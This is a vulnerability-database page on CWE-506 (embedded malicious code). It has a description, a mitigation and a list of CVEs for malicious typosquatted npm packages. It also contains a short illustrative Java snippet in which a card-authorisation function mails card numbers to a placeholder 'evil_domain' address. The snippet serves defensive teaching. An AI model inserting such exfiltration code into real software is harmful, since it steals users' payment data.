Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-506 (内嵌的恶意代码) — Vulnerability Class 78

78 vulnerabilities classified as CWE-506 (内嵌的恶意代码). AI Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
Mitigations (1)
Implementation, OperationRemove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE IDTitleCVSSSeverityPublished
CVE-2017-16074 crossenv 安全漏洞 — crossenv node module 7.5 -2018-06-07
CVE-2017-16073 noderequest 安全漏洞 — noderequest node module 7.5 -2018-06-07
CVE-2017-16072 nodemailer.js 安全漏洞 — nodemailer.js node module 7.5 -2018-06-07
CVE-2017-16070 nodecaffe 安全漏洞 — nodecaffe node module 7.5 -2018-06-07
CVE-2017-16045 jquery.js 安全漏洞 — jquery.js node module 7.5 -2018-06-04
CVE-2017-16046 MariaDB 信息泄露漏洞 — mariadb node module 7.5 -2018-06-04
CVE-2017-16048 node-sqlite 安全漏洞 — node-sqlite node module 7.5 -2018-06-04
CVE-2017-16049 nodesqlite 安全漏洞 — nodesqlite node module 7.5 -2018-06-04
CVE-2017-16050 sqlite.js 安全漏洞 — sqlite.js node module 7.5 -2018-06-04
CVE-2017-16051 sqliter 安全漏洞 — sqliter node module 7.5 -2018-06-04
CVE-2017-16052 node-fabric 安全漏洞 — node-fabric node module 7.5 -2018-06-04
CVE-2017-16053 fabric-js 安全漏洞 — fabric-js node module 7.5 -2018-06-04
CVE-2017-16054 nodefabric 安全漏洞 — nodefabric node module 7.5 -2018-06-04
CVE-2017-16055 sqlserver 安全漏洞 — sqlserver node module 7.5 -2018-06-04
CVE-2017-16044 d3.js 安全漏洞 — d3.js node module 7.5 -2018-06-04
CVE-2017-16047 mysqljs 安全漏洞 — mysqljs node module 7.5 -2018-05-29
CVE-2017-16061 tkinter 安全漏洞 — tkinter node module 7.5 -2018-05-29
CVE-2017-16062 node-tkinter 安全漏洞 — node-tkinter node module 7.5 -2018-05-29

Vulnerabilities classified as CWE-506 (内嵌的恶意代码) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.